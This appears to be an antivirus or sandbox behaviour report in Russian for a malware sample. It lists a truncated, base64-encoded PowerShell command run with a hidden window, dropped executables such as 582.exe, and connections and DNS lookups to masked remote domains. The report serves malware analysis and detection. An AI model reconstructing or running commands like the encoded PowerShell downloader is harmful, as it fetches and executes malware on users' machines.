Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAEkARQBQAFQAawBjAGcAPQAnAFgASABNAFYARgB2AHcAcgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBVAHIASQBgAFQAYABZAFAAUgBPAHQATwBDAGAAbwBsACIAIAA9AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1580
- %TEMP%\1100821.cvr
- %HOMEPATH%\582.exe
- %HOMEPATH%\582.exe
- 'ga#####erprises.com.au':80
- 'co###e.com.br':80
- 'co###e.com.br':443
- 'ge#####vebeaupre.com':80
- 'ga###ice.com':80
- 'co###e.com.br':443
- DNS ASK ga#####erprises.com.au
- DNS ASK co###e.com.br
- DNS ASK ge#####vebeaupre.com
- DNS ASK ga###ice.com
- DNS ASK wb##ur.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAEkARQBQAFQAawBjAGcAPQAnAFgASABNAFYARgB2AHcAcgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBVAHIASQBgAFQAYABZAFAAUgBPAHQATwBDAGAAbwBsACIAIAA9AC...' (со скрытым окном)